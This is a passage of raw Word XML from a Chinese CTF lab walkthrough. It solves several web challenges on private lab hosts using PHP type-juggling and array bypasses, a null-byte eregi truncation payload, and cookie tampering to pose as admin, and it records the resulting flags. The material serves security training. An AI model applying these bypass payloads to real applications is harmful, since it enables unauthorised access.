            <wp:docPr id="133" name="图片 133" descr="http://192.168.109.235/storage/images/201812101448515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2018121014485154b.pn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129" cy="433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0B" w:rsidRPr="00333AD3" w:rsidRDefault="00FA630B" w:rsidP="00FA630B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333AD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33AD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333AD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下载</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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HackBar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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，并启用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA630B" w:rsidRPr="00333AD3" w:rsidRDefault="00FA630B" w:rsidP="00FA630B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362575" cy="781050"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="134" name="图片 134" descr="http://192.168.109.235/storage/images/20181210144857I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20181210144857Ib2.pn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0B" w:rsidRPr="00333AD3" w:rsidRDefault="00FA630B" w:rsidP="00FA630B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333AD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33AD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333AD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给</w:t>
      </w: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name</w:t>
      </w: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和</w:t>
      </w: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password</w:t>
      </w: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传入数组，</w:t>
      </w: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id=admin</w:t>
      </w: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，传值如图，得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00333AD3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FA630B" w:rsidRPr="00333AD3" w:rsidRDefault="00FA630B" w:rsidP="00FA630B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159432" cy="3836369"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="135" name="图片 135" descr="http://192.168.109.235/storage/images/20181210145416n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20181210145416nsS.pn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883" cy="385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0B" w:rsidRDefault="00FA630B" w:rsidP="00FA630B"/>
    <w:p w:rsidR="00FA630B" w:rsidRDefault="00FA630B" w:rsidP="00B7126C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00D5588E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1kwnbf83sfe9d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA630B" w:rsidRPr="00FA630B" w:rsidRDefault="00FA630B" w:rsidP="00FA630B"/>
    <w:p w:rsidR="00FA630B" w:rsidRDefault="00FA630B" w:rsidP="00FA630B">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA630B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我建议你放弃</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="00474276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433F6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474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="00474276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433F6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474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="00474276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433F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>各种绕过，一言难尽</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="00474276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433F6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474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="00474276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433F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数利用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="00474276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433F6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474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="00474276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http://10.2.0.45/45,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474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="00474276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433F6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474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="00474276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</w:t>
      </w:r>
      <w:r w:rsidRPr="000433F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0433F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0433F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打开火狐浏览器，输入</w:t>
      </w:r>
      <w:r w:rsidRPr="000433F6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&lt;http://10.137.0.96/45/&gt;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0433F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0433F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地址以真实获取的为准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474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="0047427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8820150" cy="7010400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="136" name="图片 136" descr="http://192.168.109.235/storage/images/20181210152651dH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20181210152651dHB.pn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15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76" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="0047427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0433F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0433F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0433F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分析代码发现最终目标是令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v1=1,v2=1,v3=1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，从而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echo flag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，先分析第一段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="0047427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3543300" cy="1009650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="137" name="图片 137" descr="http://192.168.109.235/storage/images/20181210151514L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20181210151514LA8.pn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76" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="0047427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这里要令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a[bar1]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在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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is_numeric</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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判断下为非数字，而又使其大于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2017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，所以考虑到这里，通过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php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语言弱类型的特性构造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a[bar1]=2018a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="0047427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0433F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0433F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0433F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然后第二段代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="0047427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600700" cy="1581150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="138" name="图片 138" descr="http://192.168.109.235/storage/images/20181210151545T8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20181210151545T8J.pn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76" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="0047427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这样，首先需要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\$a[bar2]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为一个有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5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个元素的数组，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\$a["bar2"][0]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也是数组，然后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\$a["a2"]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要包含</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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hongya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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，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\$a["bar2"]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不包含</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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hongya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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，于是让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\$a[bar2]=[1],1,2,3,4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，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\$a[a2]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为数组</w:t>
      </w:r>
      <w:r w:rsidRPr="000433F6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000433F6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hongya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000433F6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”]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或者取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0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true)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474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="0047427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由于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$a=(array)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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json_decode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(@$_GET['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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foo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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']);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="0047427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所以构造</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="0047427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spellStart"/>
      <w:r w:rsidRPr="000433F6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foo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000433F6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={"bar1":"2018a","bar2":[[1],1,2,3,4],"a2":["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000433F6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hongya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000433F6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"]}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="0047427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0433F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0433F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0433F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分析第三段代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="0047427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562475" cy="1352550"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="139" name="图片 139" descr="http://192.168.109.235/storage/images/20181210151551R8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92.168.109.235/storage/images/20181210151551R8Y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76" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="0047427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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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strcmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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()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和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!==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利用数组的方式绕过，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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eregi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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则考虑通过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%00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方式截断，构造：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="0047427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433F6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$c[1][]=%00hongya2017</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="0047427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474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="0047427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433F6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$d=%00hongya2017</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="0047427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0433F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0433F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0433F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综合之前，合成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payload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，在地址栏输入，得到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474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="0047427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0433F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00EA4C46" w:rsidRDefault="00474276" w:rsidP="0047427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highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA4C46">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>?foo={"bar1":"2018a","bar2":[[1],1,2,3,4],"a2":["hongya"]}&amp;cat[1][]=%00hongya2017&amp;dog=%00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="0047427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EA4C46">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>hongya2017</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="000433F6" w:rsidRDefault="00474276" w:rsidP="00474276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358197" cy="3660313"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="140" name="图片 140" descr="http://192.168.109.235/storage/images/20181210153021EU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92.168.109.235/storage/images/20181210153021EUF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405" cy="3675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76" w:rsidRDefault="00474276" w:rsidP="00B7126C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00474276">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>e9f0c8f650be6119646732faf5a3cffc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00474276" w:rsidRDefault="00474276" w:rsidP="00474276"/>
    <w:p w:rsidR="00474276" w:rsidRDefault="00474276" w:rsidP="00474276">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD786A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>怎么回事，我是个</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD786A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD786A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>？？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="00474276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CD786A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474276" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="00474276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D786A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474276" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="00474276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CD786A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据截取，修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD786A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD786A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="00474276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D786A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>靶场知识点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="00474276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CD786A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD786A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="00474276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D786A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474276" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="00474276">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1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http://10.2.0.48/35,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先通过源码，将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hello=welcome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得到提示，修改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cookies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的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user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值为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admin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获得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474276" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="00474276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CD786A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474276" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="00474276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D786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D786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CD786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打开火狐浏览器，输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD786A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&lt;http://10.10.23.105/35/&gt;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CD786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CD786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地址以真实获取的为准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 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474276" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="0047427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35276" cy="2850729"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6985"/>
            <wp:docPr id="141" name="图片 141" descr="http://192.168.109.235/storage/images/dd3bc2267a74335235326a77ca83c918/2018-12-10-10-40-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dd3bc2267a74335235326a77ca83c918/2018-12-10-10-40-56.jp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04" cy="287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76" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="0047427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D786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D786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CD786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发现有注释，需要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hello=welcome</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="0047427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437681" cy="1464820"/>
            <wp:effectExtent l="0" t="0" r="1270" b="2540"/>
            <wp:docPr id="142" name="图片 142" descr="http://192.168.109.235/storage/images/dd3bc2267a74335235326a77ca83c918/2018-12-10-11-52-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dd3bc2267a74335235326a77ca83c918/2018-12-10-11-52-49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985" cy="149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76" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="0047427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D786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lastRenderedPageBreak/>
        <w:t>步骤</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD786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CD786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然后告诉我不是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administrator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="00474276">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="405" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD786A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>view-source:</w:t>
      </w:r>
      <w:hyperlink r:id="rId146" w:history="1">
        <w:r w:rsidRPr="00CD786A">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="4183C4"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://192.168.15.28/35/?hello=welcome</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="0047427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143376" cy="1821264"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="143" name="图片 143" descr="http://192.168.109.235/storage/images/dd3bc2267a74335235326a77ca83c918/2018-12-10-11-53-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dd3bc2267a74335235326a77ca83c918/2018-12-10-11-53-34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199" cy="183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76" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="0047427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D786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D786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CD786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下载这个火狐插件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="0047427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956839" cy="541531"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="144" name="图片 144" descr="http://192.168.109.235/storage/images/dd3bc2267a74335235326a77ca83c918/2018-12-10-10-42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dd3bc2267a74335235326a77ca83c918/2018-12-10-10-42-26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998" cy="574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76" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="0047427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D786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D786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CD786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按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F12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打开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firebug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，选择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cookies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，发现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user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是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，右键编辑修改一下，我可是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administrator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="0047427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236944" cy="2153377"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="145" name="图片 145" descr="http://192.168.109.235/storage/images/dd3bc2267a74335235326a77ca83c918/2018-12-10-14-14-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dd3bc2267a74335235326a77ca83c918/2018-12-10-14-14-39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058" cy="217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76" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="0047427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D786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D786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6</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD786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修改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cookies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值为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admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="0047427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076651" cy="4072180"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="146" name="图片 146" descr="http://192.168.109.235/storage/images/dd3bc2267a74335235326a77ca83c918/2018-12-10-14-13-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92.168.109.235/storage/images/dd3bc2267a74335235326a77ca83c918/2018-12-10-14-13-39.jp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928" cy="409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76" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="0047427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943600" cy="3200400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="147" name="图片 147" descr="http://192.168.109.235/storage/images/dd3bc2267a74335235326a77ca83c918/2018-12-10-14-16-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92.168.109.235/storage/images/dd3bc2267a74335235326a77ca83c918/2018-12-10-14-16-35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76" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="0047427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D786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D786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7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD786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D786A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>刷新页面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，并查看代码，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CD786A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>就静静的躺在那</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="00474276">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="405" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD786A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>刷新页面：</w:t>
      </w:r>
      <w:hyperlink r:id="rId152" w:history="1">
        <w:r w:rsidRPr="00CD786A">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="4183C4"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://192.168.15.28/35/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="00474276">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="405" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD786A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>右键再次查看源码：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD786A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>view-source:</w:t>
      </w:r>
      <w:hyperlink r:id="rId153" w:history="1">
        <w:r w:rsidRPr="00CD786A">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="4183C4"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://192.168.15.28/35/?hello=welcome</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00CD786A" w:rsidRDefault="00474276" w:rsidP="00474276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36863" cy="2696543"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8890"/>
            <wp:docPr id="148" name="图片 148" descr="http://192.168.109.235/storage/images/dd3bc2267a74335235326a77ca83c918/2018-12-10-14-16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192.168.109.235/storage/images/dd3bc2267a74335235326a77ca83c918/2018-12-10-14-16-02.jp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036" cy="27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76" w:rsidRDefault="00474276" w:rsidP="00B7126C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD7CA2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>5d41402abc4b2a76b9719d911017c592</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00474276" w:rsidRDefault="00474276" w:rsidP="00474276"/>
    <w:p w:rsidR="00474276" w:rsidRDefault="00474276" w:rsidP="00474276">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找找看看</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00474276" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="00474276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61DA4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474276" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="00474276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61DA4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474276" w:rsidRPr="00061DA4" w:rsidRDefault="00474276" w:rsidP="00474276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61DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>看</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00061DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00061DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，先下载图片</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00061DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>winhex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00061DA4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>打开</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
